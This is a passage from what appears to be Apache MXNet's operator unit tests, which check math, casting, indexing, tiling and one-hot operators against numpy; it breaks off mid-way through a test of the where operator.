lambda x: mx.sym.hypot(x, 3),
lambda x: np.hypot(x, 3),
lambda x: x / np.hypot(x, 3),
0.5, 0.5)
# degrees
mathematical_core("degrees",
lambda x: mx.sym.degrees(x),
lambda x: np.degrees(x),
lambda x: 180./np.pi,
0.5, 0.5)
# radians
mathematical_core("radians",
lambda x: mx.sym.radians(x),
lambda x: np.radians(x),
lambda x: np.pi / 180.,
0.6, 1)
# sinh
mathematical_core("sinh", lambda x: mx.sym.sinh(x), lambda x: np.sinh(x), lambda x: np.cosh(x))
# cosh
mathematical_core("cosh", lambda x: mx.sym.cosh(x), lambda x: np.cosh(x), lambda x: np.sinh(x), 5, 5)
# tanh
mathematical_core("tanh", lambda x: mx.sym.tanh(x), lambda x: np.tanh(x), lambda x: 1. - np.tanh(x) ** 2, 0.5, 1)
# arcsinh
mathematical_core("arcsinh", lambda x: mx.sym.arcsinh(x), lambda x: np.arcsinh(x),
lambda x: 1./(x**2 + 1.)**(1./2.))
# arccosh
mathematical_core("arccosh", lambda x: mx.sym.arccosh(x), lambda x: np.arccosh(x),
lambda x: 1./(x**2 - 1.)**(1./2.))
# arctanh
mathematical_core("arctanh", lambda x: mx.sym.arctanh(x), lambda x: np.arctanh(x),
lambda x: -1./(x**2 - 1.), 0.5)
# log1p
mathematical_core("log1p", lambda x: mx.sym.log1p(x), lambda x: np.log1p(x),
lambda x: 1. / (1.0 + x), 0.5, 0.5)
# expm1
mathematical_core("expm1", lambda x: mx.sym.expm1(x), lambda x: np.expm1(x),
lambda x: np.exp(x), 0.5, 0.5)
# log10
mathematical_core("log10", lambda x: mx.sym.log10(x), lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)))
# log2
mathematical_core("log2", lambda x: mx.sym.log2(x), lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)))
# rint
rounding("rint", lambda x: mx.sym.rint(x), lambda x: np.rint(x))
# fix
rounding("fix", lambda x: mx.sym.fix(x), lambda x: np.fix(x))
@with_seed()
def test_special_functions_using_scipy():
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
return
# gamma
mathematical_core("gamma", lambda x: mx.sym.gamma(x), lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x), 0.5, 0.5)
# gammaln
mathematical_core("gammaln", lambda x: mx.sym.gammaln(x), lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x), 0.5, 0.5)
@with_seed()
@unittest.skip("Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/12901")
def test_clip():
data = mx.symbol.Variable('data')
shape = (30, 30)
data_tmp = np.random.uniform(-1, 1, shape)
test = mx.sym.clip(data, a_max=0.6, a_min=-0.6)
check_symbolic_forward(test, [data_tmp], [np.clip(data_tmp, -0.6, 0.6)])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)],
[np.where(data_tmp < 0.6, [1], [0]) * np.where(data_tmp > -0.6, [1], [0])])
@with_seed()
def test_init():
def test_basic_val_init(sym_func, np_func, shape, dtype):
x = sym_func(shape=shape, dtype=dtype)
exe = x.bind(default_context(), args=[], args_grad=[])
exe.forward(is_train=True)
assert_almost_equal(exe.outputs[0].asnumpy(), np_func(shape=shape, dtype=dtype))
assert exe.outputs[0].asnumpy().dtype == dtype
def test_arange():
# General Random Tests
dtype_list = [np.float32, np.float64, np.int32, np.uint8]
config_list = [(10,),
(0, 10),
(5, 100, 4),
(50, -50, -2),
(-100, 100, 1),
(1.3, 456.6, 1.3)]
for dtype in dtype_list:
for config in config_list:
repeats = random.choice([1, 3])
np_out = np.repeat(np.arange(*config, dtype=dtype), repeats)
nd_out = mx.nd.arange(*config, repeat=repeats, dtype=dtype)
assert_almost_equal(np_out, nd_out.asnumpy())
def test_arange_inferstop():
s = mx.sym.arange(start=0, stop=None, infer_range=True)
s = mx.sym.elemwise_add(s, mx.sym.zeros(shape=[5]))
exe = s.bind(ctx=mx.cpu(), args={})
exe.forward()
assert_almost_equal(exe.outputs[0].asnumpy(), np.array([0,1,2,3,4]))
def test_arange_like():
shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
axis_list = [0, -1]
for sh in shape_list:
for axis in axis_list:
val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0, axis=axis)
np_out = np.arange(start=0, stop=sh[axis])
assert_almost_equal(nd_out.asnumpy(), np_out)
def test_arange_like_without_axis():
shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
for sh in shape_list:
val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0)
np_out = np.arange(start=0, stop=val.size)
assert_almost_equal(nd_out.asnumpy(), np_out.reshape(sh))
test_basic_val_init(mx.sym.zeros, np.zeros, (3, 4), np.float32)
test_basic_val_init(mx.sym.ones, np.ones, 3, np.int32)
test_basic_val_init(mx.sym.ones, np.ones, (2, 2, 3), np.float16)
test_arange()
test_arange_inferstop()
test_arange_like()
test_arange_like_without_axis()
@with_seed()
def test_order():
ctx = default_context()
def gt_topk(dat, axis, ret_typ, k, is_ascend):
if ret_typ == "indices":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
elif ret_typ == "value":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(np.sort(dat, axis=axis), axis=axis, indices=indices, mode='wrap')
else:
assert dat.shape == (5, 5, 5, 5)
assert axis is None or axis == 1
ret = np.zeros(dat.shape)
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
gt_argsort = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
if axis is None:
ret.ravel()[gt_argsort] = 1
else:
for i in range(5):
for j in range(5):
for k in range(5):
ret[i, gt_argsort[i, :, j, k], j, k] = 1
return ret
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(np.float32)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
def get_large_matrix():
data = np.array([np.arange(300096).astype(np.float32)])
data = np.repeat(data, 100, axis=0)
np.apply_along_axis(np.random.shuffle, 1, data)
return data
large_matrix_npy = get_large_matrix()
for axis in [1, 3, None]:
K = [1, 3, 5, 7] if axis is None else [1, 3, 5]
for k in K:
for is_ascend in [True, False]:
b = mx.sym.topk(a, axis=axis, is_ascend=is_ascend, ret_typ="value", k=k)
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=k, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
for axis in [1, 3, None]:
for is_ascend in [True, False]:
b = mx.sym.sort(a, axis=axis, is_ascend=is_ascend)
if axis is None:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=a_npy.size, is_ascend=is_ascend)
else:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=5, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5,
is_ascend=is_ascend)])
b = mx.sym.topk(a, axis=3, is_ascend=is_ascend, ret_typ="indices", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 3))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=3, ret_typ="indices", k=3,
is_ascend=False)])
b = mx.sym.topk(a, axis=1, is_ascend=True, ret_typ="mask", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="mask", k=3,
is_ascend=True)])
b = mx.sym.argsort(a, axis=1, is_ascend=False)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=5,
is_ascend=False)])
b = mx.sym.argmax(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=False)])
b = mx.sym.argmin(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=True)])
@with_seed()
def test_blockgrad():
a = mx.sym.Variable('a')
b = mx.sym.BlockGrad(a)
exe = b.simple_bind(ctx=default_context(), a=(10, 10))
a_npy = np.random.rand(10, 10)
exe.forward(is_train=True, a=a_npy)
assert_almost_equal(exe.outputs[0].asnumpy(), a_npy)
exe.backward() # No error if BlockGrad works
@with_seed()
def test_take():
def grad_helper(grad_in, axis, idx):
if axis == 0:
if axis == len(grad_in.shape) - 1:
grad_in[idx] += 1.0
else:
grad_in[idx, :] += 1.0
elif axis == 1:
if axis == len(grad_in.shape) - 1:
grad_in[:, idx] += 1.0
else:
grad_in[:, idx, :] += 1.0
elif axis == 2:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, idx] += 1.0
else:
grad_in[:, :, idx, :] += 1.0
elif axis == 3:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, :, idx] += 1.0
else:
grad_in[:, :, :, idx, :] += 1.0
elif axis == 4:
grad_in[:, :, :, :, idx] += 1.0
else:
raise ValueError("axis %d is not supported..." % axis)
def check_output_n_grad(data_shape, idx_shape, axis, mode):
data = mx.sym.Variable('a')
idx = mx.sym.Variable('indices')
idx = mx.sym.BlockGrad(idx)
result = mx.sym.take(a=data, indices=idx, axis=axis, mode=mode)
exe = result.simple_bind(default_context(), a=data_shape,
indices=idx_shape, axis=axis, mode=mode)
data_real = np.random.normal(size=data_shape).astype('float32')
idx_real = np.random.randint(low=0, high=data_shape[axis], size=idx_shape)
if axis < 0:
axis += len(data_shape)
grad_out = np.ones((data_shape[0:axis] if axis > 0 else ()) + idx_shape + (data_shape[axis+1:] if axis < len(data_shape) - 1 else ()), dtype='float32')
grad_in = np.zeros(data_shape, dtype='float32')
exe.arg_dict['a'][:] = mx.nd.array(data_real)
exe.arg_dict['indices'][:] = mx.nd.array(idx_real)
exe.forward(is_train=True)
assert_almost_equal(exe.outputs[0].asnumpy(), np.take(data_real, idx_real, axis=axis, mode=mode))
for i in np.nditer(idx_real):
grad_helper(grad_in, axis, i)
exe.backward([mx.nd.array(grad_out)])
assert_almost_equal(exe.grad_dict['a'].asnumpy(), grad_in)
def check_autograd_req():
row_len = 2
col_len = 8
shape = (row_len, col_len)
sc = mx.nd.random.uniform(-1.0, 1.0, shape=shape, dtype="float32")
sc.attach_grad()
i = mx.nd.array([0], dtype="int64")
j = mx.nd.array([0], dtype="int64")
with mx.autograd.record(train_mode=True):
xs = []
for _ in range(row_len):
x_i = []
for _ in range(col_len):
x_ij = sc.take(i).squeeze(axis=0).take(j).squeeze(axis=0)
x_i.append(x_ij)
j = j + 1
i = i + 1
j = j - col_len # reset j
xs.append(mx.nd.stack(*x_i))
x = mx.nd.stack(*xs)
x = x.sum()
x.backward()
assert_almost_equal(np.ones(sc.grad.shape), sc.grad.asnumpy())
for mode in ['clip', 'wrap']:
for data_ndim in range(1, 5):
for idx_ndim in range(1, 4):
for axis in range(-data_ndim, data_ndim):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=1, high=5), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=1, high=5), )
check_output_n_grad(data_shape, idx_shape, axis, mode)
check_autograd_req()
@with_seed()
def test_grid_generator():
# transform_type = affine
test_case = [(20,21),(4,3),(6,12),(15,17)]
for target_shape in test_case:
affine_matrix = mx.sym.Variable('affine')
grid = mx.sym.GridGenerator(data=affine_matrix,transform_type='affine', target_shape=target_shape)
exe = grid.simple_bind(ctx=default_context(), affine=(1,6), grad_req='write')
# check forward
exe.arg_dict['affine'][:] = np.array([[1.0,0,0,0,1.0,0]])
exe.forward(is_train=True)
output = exe.outputs[0].asnumpy()
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0]), np.arange(target_shape[1]))
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
tmp = np.zeros((3,target_shape[0]*target_shape[1]))
tmp[0] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) % target_shape[1]) * (2.0 / (target_shape[1]-1))
tmp[1] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) // target_shape[1]) * (2.0 / (target_shape[0]-1))
tmp[2] = 1
grad_est = np.dot(out_grad[0].reshape(2,target_shape[0]*target_shape[1]),tmp.T).reshape(1,6)
assert_almost_equal(exe.grad_dict['affine'].asnumpy(), grad_est, rtol=1e-3, atol=1e-5)
# check addto
exe = grid.simple_bind(ctx=default_context(), affine=(1,6), grad_req='add')
grid_grad_npy = np.random.normal(size=exe.grad_dict['affine'].shape)
exe.grad_dict['affine'][:] = grid_grad_npy
exe.arg_dict['affine'][:] = np.array([[1.0, 0, 0, 0, 1.0, 0]])
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['affine'].asnumpy(), grad_est + grid_grad_npy, rtol=1e-2, atol=1e-5)
# transform_type = warp
test_case = [(12,21),(4,3),(6,12)]
for target_shape in test_case:
flow = mx.sym.Variable('flow')
grid = mx.sym.GridGenerator(data=flow,transform_type='warp', target_shape=target_shape)
exe = grid.simple_bind(ctx=default_context(), flow=(1,2)+target_shape, grad_req='write')
# check forward
exe.arg_dict['flow'][:] = np.ones((1,2)+target_shape)
exe.forward(is_train=True)
output = exe.outputs[0].asnumpy()
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0])+1, np.arange(target_shape[1])+1)
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
grad_est = np.zeros((1,2)+target_shape)
grad_est[0,0] = out_grad[0,0] / ((target_shape[1]-1.0) / 2.0)
grad_est[0,1] = out_grad[0,1] / ((target_shape[0]-1.0) / 2.0)
assert_almost_equal(exe.grad_dict['flow'].asnumpy(), grad_est, rtol=1e-3)
# check addto
exe_add = grid.simple_bind(ctx=default_context(), flow=(1, 2) + target_shape, grad_req='add')
flow_grad_npy = np.random.normal(size=exe_add.grad_dict['flow'].shape)
exe_add.arg_dict['flow'][:] = np.ones((1, 2) + target_shape)
exe_add.grad_dict['flow'][:] = flow_grad_npy
exe_add.forward(is_train=True)
exe_add.backward(mx.nd.array(out_grad))
assert_almost_equal(exe_add.grad_dict['flow'].asnumpy(), grad_est + flow_grad_npy, rtol=1e-3, atol=1e-5)
@with_seed()
def test_index2d():
for _ in range(30):
n = np.random.randint(1, 100)
m = np.random.randint(1, 500)
data = mx.random.uniform(-1, 1, shape=(n, m), ctx=default_context())
x = mx.nd.array(np.random.randint(0, m, size=n), ctx=default_context(), dtype='int32')
r = mx.nd.batch_take(data, x)
assert_almost_equal(r.asnumpy(), data.asnumpy()[np.arange(n), x.asnumpy()])
@with_seed()
def test_cast():
for srctype in [np.int32, np.float32, np.float16]:
for dsttype in [np.float32, np.int32, np.float16]:
x = mx.sym.Variable('x', dtype=srctype)
y = mx.sym.Cast(x, dtype=dsttype)
exe = y.simple_bind(ctx=default_context(), x=(10, 10))
assert exe.arg_arrays[0].dtype == srctype
assert exe.outputs[0].dtype == dsttype
X = np.random.uniform(-10, 10, size=(10, 10))
exe.arg_arrays[0][:] = X
exe.forward(is_train=True)
exe.backward(mx.nd.array(X, dtype=dsttype, ctx=default_context()))
assert_almost_equal(exe.outputs[0].asnumpy(), X.astype(srctype).astype(dsttype), rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_arrays[0].asnumpy(), X.astype(dsttype).astype(srctype), rtol=1e-3, atol=1e-5)
def get_cast_op_data():
FP16_FRACTION_BITS = 10
FP32_FRACTION_BITS = 23
FP32_EXP_MIN = -126
FP32_EXP_MAX = 127
# generate test cases in the vicinity of representable float16 mantissas
# and mid-way between them, but over the full range of float32 exponents.
for sign_bit in [0, 1]:
for exponent in range(FP32_EXP_MIN - FP32_FRACTION_BITS - 1, FP32_EXP_MAX + 2):
denominator = 2**(FP16_FRACTION_BITS + 1)
for numerator in range(0, denominator):
fraction = numerator / float(denominator)
for y in [-1.0, 0.0, 1.0]:
small_delta = y / 2**FP32_FRACTION_BITS
val = (-1.0)**sign_bit * 2.0**exponent * (1.0 + fraction + small_delta)
yield val
# Add np.nan as a final data value to process
yield np.nan
# Test requires all platforms to round float32->float16 with same round-to-nearest-even policy.
@with_seed()
def test_cast_float32_to_float16():
input_np = np.array(list(get_cast_op_data())).astype(np.float32)
# The intermediate cast to np.float64 below gets around a numpy rounding bug that is fixed
# as of numpy 1.17 by PR https://github.com/numpy/numpy/pull/12722
expected_output = input_np.astype(np.float64).astype(np.float16)
def check_cast(op, input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float32)
sym = op(x, dtype=np.float16)
ctx = default_context()
exe = sym.bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float32, ctx=ctx)})
assert exe.arg_arrays[0].dtype == np.float32
assert exe.outputs[0].dtype == np.float16
exe.forward(is_train=True)
sym_output = exe.outputs[0].asnumpy()
for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, sym_output, expected_output):
assert (model_fp16_val == np_fp16_val) or \
(np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
fp32_val, model_fp16_val, np_fp16_val)
check_cast(mx.sym.Cast, input_np, expected_output)
check_cast(mx.sym.amp_cast, input_np, expected_output)
@with_seed()
def test_amp_multicast():
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_context()
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
exe = res.bind(ctx, {'x': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx),
'y': mx.nd.random.uniform(shape=(3, 3), dtype=np.float32, ctx=ctx),
'z': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
out1, out2, out3 = exe.outputs
assert out1.asnumpy().dtype == np.float32
assert out2.asnumpy().dtype == np.float32
assert out3.asnumpy().dtype == np.float32
def check_amp_multicast(input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_context()
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
exe = res.bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float16, ctx=ctx),
'y': mx.nd.array(input_np, dtype=np.float32, ctx=ctx),
'z': mx.nd.array(input_np, dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
sym_output = exe.outputs[0].asnumpy()
for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, sym_output, expected_output):
assert (model_fp16_val == np_fp16_val) or \
(np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
fp32_val, model_fp16_val, np_fp16_val)
input_np = np.array(list(get_cast_op_data()), dtype=np.float16)
expected_output = input_np.astype(np.float32)
check_amp_multicast(input_np, expected_output)
@with_seed()
def test_all_finite():
data = mx.sym.Variable("data", dtype=np.float32)
data2 = mx.sym.Variable("data2", dtype=np.float32)
finite_arr = mx.nd.array([[0, 0]])
inf_arr = mx.nd.array([[np.inf, np.inf]])
z = mx.sym.all_finite(data)
ctx = default_context()
exe = z.bind(ctx, {'data': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
exe = z.bind(ctx, {'data': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z.bind(ctx, {'data': finite_arr, 'data2': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z.bind(ctx, {'data': finite_arr, 'data2': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
@with_seed()
def test_repeat():
def test_repeat_forward():
ndim_max = 6 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
repeats = 3
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(0, ndim):
shape += (np.random.randint(1, size_max+1), )
a = np.random.random_sample(size=shape)
aa = np.repeat(a, repeats)
b = mx.nd.array(a, ctx=default_context())
bb = mx.nd.repeat(b, repeats).asnumpy()
assert_almost_equal(aa, bb)
for axis in range(0, ndim):
aa = np.repeat(a, repeats, axis)
bb = mx.nd.repeat(b, repeats, axis).asnumpy()
assert_almost_equal(aa, bb)
def test_repeat_backward(axis):
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=axis)
exe = test.bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * repeats)
if axis == 0:
npout_grad = npout_grad.reshape(n1 * repeats, n2)
elif axis == 1:
npout_grad = npout_grad.reshape(n1, n2 * repeats)
else:
raise RuntimeError("Invalid axis value")
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
if axis == 0:
for i in range(shape[0]):
for j in range(shape[1]):
k = i * repeats
expected_grad[i][j] = sum(npout_grad[k:k + repeats, j])
elif axis == 1:
for j in range(shape[1]):
for i in range(shape[0]):
k = j * repeats
expected_grad[i][j] = sum(npout_grad[i, k:k + repeats])
else:
raise RuntimeError("Invalid axis value")
assert_almost_equal(expected_grad, arr_grad.asnumpy(), rtol=1e-3)
def test_repeat_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=0)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-3, rtol=1e-2)
test_repeat_forward()
test_repeat_backward(axis=0)
test_repeat_backward(axis=1)
test_repeat_numeric_gradient()
@with_seed()
def test_reverse():
data = mx.symbol.Variable('data')
shape = (5, 5, 5)
data_tmp = np.random.uniform(-1, 1, shape)
test = mx.sym.reverse(data, axis=[1, 2])
grad = np.random.uniform(-1, 1, shape)
check_numeric_gradient(test, [data_tmp], numeric_eps=2E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp[:, ::-1, ::-1]])
check_symbolic_backward(test, [data_tmp], [grad], [grad[:, ::-1, ::-1]])
@with_seed()
def test_tile():
def test_normal_case():
ndim_min = 1
ndim_max = 5 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
length_max = 3 # max length of reps
rep_max = 10 # max number of tiling in each dim
for ndim in range(ndim_min, ndim_max+1):
shape = []
for i in range(1, ndim+1):
shape.append(np.random.randint(1, size_max+1))
shape = tuple(shape)
a = np.random.randint(0, 100, shape)
b = mx.nd.array(a, dtype=a.dtype)
reps_len = np.random.randint(1, length_max+1)
reps_tuple = ()
for i in range(1, reps_len):
reps_tuple += (np.random.randint(1, rep_max), )
reps_array = np.asarray(reps_tuple)
a_tiled = np.tile(a, reps_array)
b_tiled = mx.nd.tile(b, reps_tuple).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_tensor():
shape = (2, 3, 0, 4)
a = np.array([], dtype=np.int32).reshape(shape)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
reps = (2, 4, 6)
a_tiled = np.tile(a, reps)
b_tiled = mx.nd.tile(b, reps).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_reps():
a = np.array([[2, 3, 4], [5, 6, 7]], dtype=np.int32)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
a_tiled = np.tile(a, ())
b_tiled = mx.nd.tile(b, ()).asnumpy()
assert same(a_tiled, b_tiled)
def test_tile_backward():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
exe = test.bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * reps1 * reps2).reshape(n1 * reps1, n2 * reps2)
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
for i in range(shape[0]):
for j in range(shape[1]):
expected_grad[i][j] += sum(sum(npout_grad[i:(n1 * reps1):reps1, j:(n2 * reps2):reps2]))
assert_almost_equal(expected_grad, arr_grad.asnumpy(), rtol=1e-3)
def test_tile_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-2, rtol=1e-2)
def test_invalid_reps():
data = mx.nd.arange(16).reshape((4, 4))
assert_exception(mx.nd.tile, MXNetError, data, (1, 2, -3))
assert_exception(mx.nd.tile, MXNetError, data, (1, 0, 3))
test_normal_case()
with mx.np_shape():
test_empty_tensor()
test_empty_reps()
test_tile_backward()
test_tile_numeric_gradient()
test_invalid_reps()
@with_seed()
def test_one_hot():
def test_normal_case(index_type=np.int32):
ndim_max = 6
dim_size_max = 20
depth = int(dim_size_max / 2)
on_value = 1
off_value = 0
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(1, ndim+1):
shape += (np.random.randint(1, dim_size_max+1), )
indices = np.random.randint(-dim_size_max, dim_size_max+1,
size=np.prod(shape)).reshape(shape)
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=index_type),
depth=depth, dtype=np.int32)
expected_array = np.zeros((np.prod(shape), depth), dtype=np.int32)
expected_array[:] = off_value
indices_1d = indices.flatten()
row = 0
for idx in indices_1d:
if 0 <= idx < depth:
expected_array[row, idx] = on_value
row += 1
expected_array = expected_array.reshape(shape + (depth, ))
one_hot_array = mx_one_hot_array.asnumpy()
assert same(expected_array, one_hot_array)
def test_empty_indices():
shape = (2, 0, 9, 3)
indices = np.array([]).reshape(shape)
depth = 10
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth, ))
assert same(expected_array, mx_one_hot_array)
def test_zero_depth():
shape = (2, 4, 9, 3)
indices = np.ones(shape)
depth = 0
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth, ))
assert same(expected_array, mx_one_hot_array)
test_normal_case(index_type=np.int32)
test_normal_case(index_type=np.float64)
test_normal_case(index_type=np.float32)
test_normal_case(index_type=np.float16)
with mx.np_shape():
test_empty_indices()
test_zero_depth()
@with_seed()
def test_where():
def get_forward_expected_output(condition, x, y):
original_shape = x.shape
out = np.zeros(original_shape)
if condition.shape == x.shape:
for index, c in np.ndenumerate(condition):
if c != 0:
out[index] = x[index]
else:
out[index] = y[index]
elif condition.shape == (x.shape[0], ):
s = x.shape
m = s[0]
n = int(np.prod(s)/s[0])
x2d = x.reshape((m, n))
y2d = y.reshape((m, n))
out = out.reshape((m, n))
for i in range(0, m):
if condition[i] != 0:
